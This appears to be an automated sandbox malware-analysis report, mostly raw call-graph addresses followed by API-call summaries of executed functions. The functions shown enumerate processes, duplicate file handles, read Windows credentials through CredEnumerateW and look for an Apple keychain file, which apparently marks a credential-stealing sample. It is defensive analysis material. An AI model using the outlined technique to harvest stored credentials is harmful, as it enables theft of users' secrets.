4373ac 40297->40300 40378 4446ea 11 API calls 40298->40378 40301 416935 16 API calls 40300->40301 40302 4373ca 40301->40302 40303 438460 134 API calls 40302->40303 40308 4251c4 137 API calls 40302->40308 40312 415a91 memset 40302->40312 40315 43758f 40302->40315 40327 437584 40302->40327 40330 437d3c 135 API calls 40302->40330 40379 425433 13 API calls 40302->40379 40380 425413 17 API calls 40302->40380 40381 42533e 16 API calls 40302->40381 40382 42538f 16 API calls 40302->40382 40383 42453e 123 API calls 40302->40383 40303->40302 40304 4375bc 40306 415c7d 16 API calls 40304->40306 40307 4375d2 40306->40307 40309 4442e6 11 API calls 40307->40309 40329 4373a7 40307->40329 40308->40302 40310 4375e2 40309->40310 40310->40329 40386 444283 13 API calls 40310->40386 40312->40302 40384 42453e 123 API calls 40315->40384 40318 4375f4 40321 437620 40318->40321 40322 43760b 40318->40322 40320 43759f 40323 416935 16 API calls 40320->40323 40325 416935 16 API calls 40321->40325 40387 444283 13 API calls 40322->40387 40323->40327 40325->40329 40327->40304 40385 42453e 123 API calls 40327->40385 40328 437612 memcpy 40328->40329 40329->40263 40330->40302 40331->40247 40332->40267 40333->40264 40334->40267 40335->40247 40336->40272 40337->40282 40338->40278 40339->40272 40340->40272 40342 41bc3b 101 API calls 40341->40342 40343 41f1b4 40342->40343 40344 41edad 86 API calls 40343->40344 40351 41f282 40343->40351 40345 41f1cb 40344->40345 40346 41f1f5 memcmp 40345->40346 40347 41f20e 40345->40347 40345->40351 40346->40347 40348 41f21b memcmp 40347->40348 40347->40351 40349 41f326 40348->40349 40352 41f23d 40348->40352 40350 41ee6b 86 API calls 40349->40350 40349->40351 40350->40351 40351->40291 40352->40349 40353 41f28e memcmp 40352->40353 40355 41c8df 56 API calls 40352->40355 40353->40349 40354 41f2a9 40353->40354 40354->40349 40357 41f308 40354->40357 40358 41f2d8 40354->40358 40356 41f269 40355->40356 40356->40349 40359 41f287 40356->40359 40360 41f27a 40356->40360 40357->40349 40364 4446ce 11 API calls 40357->40364 40361 41ee6b 86 API calls 40358->40361 40359->40353 40362 41ee6b 86 API calls 40360->40362 40363 41f2e0 40361->40363 40362->40351 40365 41b1ca memset 40363->40365 40364->40349 40365->40351 40366->40291 40367->40291 40368->40291 40369->40285 40370->40286 40372 417044 40371->40372 40373 41705c 40371->40373 40375 416760 11 API calls 40372->40375 40377 417055 40372->40377 40374 417075 40373->40374 40376 41707a 11 API calls 40373->40376 40374->40297 40375->40377 40376->40372 40377->40297 40378->40329 40379->40302 40380->40302 40381->40302 40382->40302 40383->40302 40384->40320 40385->40304 40386->40318 40387->40328 40393 415cfe 40388->40393 40397 415d23 __aullrem __aulldvrm 40393->40397 40400 41628e 40393->40400 40394 4163ca 40407 416422 11 API calls 40394->40407 40396 416172 memset 40396->40397 40397->40394 40397->40396 40398 416422 10 API calls 40397->40398 40399 415cb9 10 API calls 40397->40399 40397->40400 40398->40397 40399->40397 40401 416520 40400->40401 40402 416527 40401->40402 40406 416574 40401->40406 40403 416544 40402->40403 40402->40406 40408 4156aa 11 API calls 40402->40408 40405 416561 memcpy 40403->40405 40403->40406 40405->40406 40406->40200 40407->40400 40408->40403 40430 41493c EnumResourceNamesW 37672 4287c1 37673 4287d2 37672->37673 37674 429ac1 37672->37674 37675 428818 37673->37675 37676 42881f 37673->37676 37691 425711 37673->37691 37686 425ad6 37674->37686 37742 415c56 11 API calls 37674->37742 37709 42013a 37675->37709 37737 420244 97 API calls 37676->37737 37681 4260dd 37736 424251 120 API calls 37681->37736 37683 4259da 37735 416760 11 API calls 37683->37735 37689 422aeb memset memcpy memcpy 37689->37691 37690 429a4d 37692 429a66 37690->37692 37696 429a9b 37690->37696 37691->37674 37691->37683 37691->37689 37691->37690 37694 4260a1 37691->37694 37705 4259c2 37691->37705 37708 425a38 37691->37708 37725 4227f0 memset memcpy 37691->37725 37726 422b84 15 API calls 37691->37726 37727 422b5d memset memcpy memcpy 37691->37727 37728 422640 13 API calls 37691->37728 37730 4241fc 11 API calls 37691->37730 37731 42413a 90 API calls 37691->37731 37738 415c56 11 API calls 37692->37738 37734 415c56 11 API calls 37694->37734 37697 429a96 37696->37697 37740 416760 11 API calls 37696->37740 37741 424251 120 API calls 37697->37741 37700 429a7a 37739 416760 11 API calls 37700->37739 37705->37686 37729 415c56 11 API calls 37705->37729 37708->37705 37732 422640 13 API calls 37708->37732 37733 4226e0 12 API calls 37708->37733 37710 42014c 37709->37710 37713 420151 37709->37713 37752 41e466 97 API calls 37710->37752 37712 420162 37712->37691 37713->37712 37714 4201b3 37713->37714 37715 420229 37713->37715 37716 4201b8 37714->37716 37717 4201dc 37714->37717 37715->37712 37718 41fd5e 86 API calls 37715->37718 37743 41fbdb 37716->37743 37717->37712 37721 4201ff 37717->37721 37749 41fc4c 37717->37749 37718->37712 37721->37712 37724 42013a 97 API calls 37721->37724 37724->37712 37725->37691 37726->37691 37727->37691 37728->37691 37729->37683 37730->37691 37731->37691 37732->37708 37733->37708 37734->37683 37735->37681 37736->37686 37737->37691 37738->37700 37739->37697 37740->37697 37741->37674 37742->37683 37744 41fbf1 37743->37744 37745 41fbf8 37743->37745 37748 41fc39 37744->37748 37767 4446ce 11 API calls 37744->37767 37757 41ee26 37745->37757 37748->37712 37753 41fd5e 37748->37753 37750 41ee6b 86 API calls 37749->37750 37751 41fc5d 37750->37751 37751->37717 37752->37713 37755 41fd65 37753->37755 37754 41fdab 37754->37712 37755->37754 37756 41fbdb 86 API calls 37755->37756 37756->37755 37758 41ee41 37757->37758 37759 41ee32 37757->37759 37768 41edad 37758->37768 37771 4446ce 11 API calls 37759->37771 37762 41ee3c 37762->37744 37765 41ee58 37765->37762 37773 41ee6b 37765->37773 37767->37748 37777 41be52 37768->37777 37771->37762 37772 41eb85 11 API calls 37772->37765 37774 41ee70 37773->37774 37775 41ee78 37773->37775 37833 41bf99 86 API calls 37774->37833 37775->37762 37778 41be6f 37777->37778 37779 41be5f 37777->37779 37785 41be8c 37778->37785 37798 418c63 37778->37798 37812 4446ce 11 API calls 37779->37812 37782 41be69 37782->37762 37782->37772 37783 41bee7 37783->37782 37816 41a453 86 API calls 37783->37816 37785->37782 37785->37783 37786 41bf3a 37785->37786 37789 41bed1 37785->37789 37815 4446ce 11 API calls 37786->37815 37788 41bef0 37788->37783 37791 41bf01 37788->37791 37789->37788 37792 41bee2 37789->37792 37790 41bf24 memset 37790->37782 37791->37790 37793 41bf14 37791->37793 37813 418a6d memset memcpy memset 37791->37813 37802 41ac13 37792->37802 37814 41a223 memset memcpy memset 37793->37814 37797 41bf20 37797->37790 37801 418c72 37798->37801 37799 418c94 37799->37785 37800 418d51 memset memset 37800->37799 37801->37799 37801->37800 37803 41ac52 37802->37803 37804 41ac3f memset 37802->37804 37807 41ac6a 37803->37807 37817 41dc14 19 API calls 37803->37817 37805 41acd9 37804->37805 37805->37783 37809 41aca1 37807->37809 37818 41519d 37807->37818 37809->37805 37810 41acc0 memset 37809->37810 37811 41accd memcpy 37809->37811 37810->37805 37811->37805 37812->37782 37813->37793 37814->37797 37815->37783 37817->37807 37821 4175ed 37818->37821 37829 417570 SetFilePointer 37821->37829 37824 41760a ReadFile 37825 417637 37824->37825 37826 417627 GetLastError 37824->37826 37827 4151b3 37825->37827 37828 41763e memset 37825->37828 37826->37827 37827->37809 37828->37827 37830 4175b2 37829->37830 37831 41759c GetLastError 37829->37831 37830->37824 37830->37827 37831->37830 37832 4175a8 GetLastError 37831->37832 37832->37830 37833->37775 37834 417bc5 37835 417c61 37834->37835 37840 417bda 37834->37840 37836 417bf6 UnmapViewOfFile CloseHandle 37836->37836 37836->37840 37838 417c2c 37838->37840 37846 41851e 20 API calls 37838->37846 37840->37835 37840->37836 37840->37838 37841 4175b7 37840->37841 37842 4175d6 FindCloseChangeNotification 37841->37842 37843 4175c8 37842->37843 37844 4175df 37842->37844 37843->37844 37845 4175ce Sleep 37843->37845 37844->37840 37845->37842 37846->37838 39880 4147f3 39883 414561 39880->39883 39882 414813 39884 41456d 39883->39884 39885 41457f GetPrivateProfileIntW 39883->39885 39888 4143f1 memset _itow WritePrivateProfileStringW 39884->39888 39885->39882 39887 41457a 39887->39882 39888->39887

                    Executed Functions

                    Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                    APIs
                    • memset.MSVCRT ref: 0040DDAD
                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                      • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                    • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                    • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                    • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                    • _wcsicmp.MSVCRT ref: 0040DEB2
                    • _wcsicmp.MSVCRT ref: 0040DEC5
                    • _wcsicmp.MSVCRT ref: 0040DED8
                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                    • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                    • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                    • memset.MSVCRT ref: 0040DF5F
                    • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                    • _wcsicmp.MSVCRT ref: 0040DFB2
                    • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                    • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                    • API String ID: 594330280-3398334509
                    • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                    • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                    • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                    • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                    Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 643 413eb7-413ebd 641->643 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 643->645 646 413ebf-413ec6 ??3@YAXPAX@Z 643->646 648 413edb-413ee2 645->648 646->648 656 413ee4 648->656 657 413ee7-413efe 648->657 662 413ea2-413eae CloseHandle 650->662 654 413e61-413e68 651->654 655 413e37-413e44 GetModuleHandleW 651->655 654->650 658 413e6a-413e76 654->658 655->654 660 413e46-413e5c GetProcAddress 655->660 656->657 657->638 658->650 660->654 662->641
                    APIs
                      • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                    • memset.MSVCRT ref: 00413D7F
                    • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                    • memset.MSVCRT ref: 00413E07
                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                    • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                    • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                    • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                    • String ID: QueryFullProcessImageNameW$kernel32.dll
                    • API String ID: 912665193-1740548384
                    • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                    • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                    • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                    • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                    Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                    • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                    • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                    • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                    • LockResource.KERNEL32(00000000), ref: 0040B5DD
                    • memcpy.MSVCRT ref: 0040B60D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                    • String ID: BIN
                    • API String ID: 1668488027-1015027815
                    • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                    • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                    • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                    • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                    Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                      • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                      • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                    • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                    • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                    • String ID:
                    • API String ID: 2947809556-0
                    • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                    • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                    • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                    • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                    Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                    • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileFind$FirstNext
                    • String ID:
                    • API String ID: 1690352074-0
                    • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                    • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                    • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                    • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                    Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0041898C
                    • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: InfoSystemmemset
                    • String ID:
                    • API String ID: 3558857096-0
                    • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                    • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                    • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                    • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                    Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 38 44558e-445594 call 444b06 4->38 39 44557e-44558c call 4136c0 call 41366b 4->39 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 42 445823-445826 14->42 15->16 22 445672-445683 call 40a889 call 403fbe 16->22 23 4455fb-445601 16->23 49 445879-44587c 18->49 24 44594f-445958 19->24 25 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->25 82 445685 22->82 83 4456b2-4456b5 call 40b1ab 22->83 34 445605-445607 23->34 35 445603 23->35 32 4459f2-4459fa 24->32 33 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 24->33 134 44592d-445945 call 40b6ef 25->134 135 44594a 25->135 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 32->44 45 445b29-445b32 32->45 153 4459d0-4459e8 call 40b6ef 33->153 154 4459ed 33->154 34->22 41 445609-44560d 34->41 35->34 38->3 39->38 41->22 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 63 4458a2-4458aa call 40b1ab 49->63 64 44587e 49->64 150 445665-445670 call 40b1ab 50->150 151 445643-445663 call 40a9b5 call 4087b3 50->151 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 87 445fae-445fb2 60->87 88 445d2b-445d3b 60->88 168 445cf5 61->168 169 445cfc-445d03 61->169 63->19 80 445884-44589d call 40a9b5 call 4087b3 64->80 137 445849 66->137 247 445c77 67->247 68->67 81 445ba2-445bcf call 4099c6 call 445403 call 445389 68->81 156 44589f 80->156 81->53 99 44568b-4456a4 call 40a9b5 call 4087b3 82->99 115 4456ba-4456c4 83->115 89 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 88->89 90 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 88->90 162 445d67-445d6c 89->162 163 445d71-445d83 call 445093 89->163 196 445e17 90->196 197 445e1e-445e25 90->197 158 4456a9-4456b0 99->158 129 4457f9 115->129 130 4456ca-4456d3 call 413cfa call 413d4c 115->130 129->6 172 4456d8-4456f7 call 40b2cc call 413fa6 130->172 134->135 135->24 137->51 150->115 151->150 153->154 154->32 156->63 158->83 158->99 174 445fa1-445fa9 call 40b6ef 162->174 163->87 168->169 179 445d05-445d13 169->179 180 445d17 169->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->87 179->180 180->60 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->87 255 445f9b 218->255 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 255->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                    APIs
                    • memset.MSVCRT ref: 004455C2
                    • wcsrchr.MSVCRT ref: 004455DA
                    • memset.MSVCRT ref: 0044570D
                    • memset.MSVCRT ref: 00445725
                      • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                      • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                      • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                      • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                      • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                      • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                      • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                      • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                    • memset.MSVCRT ref: 0044573D
                    • memset.MSVCRT ref: 00445755
                    • memset.MSVCRT ref: 004458CB
                    • memset.MSVCRT ref: 004458E3
                    • memset.MSVCRT ref: 0044596E
                    • memset.MSVCRT ref: 00445A10
                    • memset.MSVCRT ref: 00445A28
                    • memset.MSVCRT ref: 00445AC6
                      • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                      • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                      • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                      • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                      • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                    • memset.MSVCRT ref: 00445B52
                    • memset.MSVCRT ref: 00445B6A
                    • memset.MSVCRT ref: 00445C9B
                    • memset.MSVCRT ref: 00445CB3
                    • _wcsicmp.MSVCRT ref: 00445D56
                    • memset.MSVCRT ref: 00445B82
                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                    • memset.MSVCRT ref: 00445986
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                    • String ID: *.*$Apple Computer\Preferences\keychain.plist
                    • API String ID: 2745753283-3798722523
